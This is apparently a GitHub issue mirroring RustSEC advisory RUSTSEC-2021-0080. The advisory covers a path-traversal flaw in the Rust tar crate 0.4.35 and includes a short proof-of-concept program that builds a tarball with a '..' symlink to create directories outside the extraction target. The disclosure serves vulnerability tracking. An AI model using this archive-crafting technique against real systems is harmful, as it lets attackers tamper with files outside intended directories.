RUSTSEC-2021-0080: Links in archive can create arbitrary directories
github-actions opened this issue · 1 comments
github-actions commented
Links in archive can create arbitrary directories
| Details | |
|---|---|
| Package | tar |
| Version | 0.4.35 |
| URL | alexcrichton/tar-rs#238 |
| Date | 2021-07-19 |
When unpacking a tarball that contains a symlink the tar crate may create
directories outside of the directory it's supposed to unpack into.
The function errors when it's trying to create a file, but the folders are
already created at this point.
use std::{io, io::Result};
use tar::{Archive, Builder, EntryType, Header};
fn main() -> Result<()> {
let mut buf = Vec::new();
{
let mut builder = Builder::new(&mut buf);
// symlink: parent -> ..
let mut header = Header::new_gnu();
header.set_path("symlink")?;
header.set_link_name("..")?;
header.set_entry_type(EntryType::Symlink);
header.set_size(0);
header.set_cksum();
builder.append(&header, io::empty())?;
// file: symlink/exploit/foo/bar
let mut header = Header::new_gnu();
header.set_path("symlink/exploit/foo/bar")?;
header.set_size(0);
header.set_cksum();
builder.append(&header, io::empty())?;
builder.finish()?;
};
Archive::new(&*buf).unpack("demo")
}This issue was discovered and reported by Martin Michaelis (@mgjm).
See advisory page for additional details.
Licenser commented
This is resolved with troy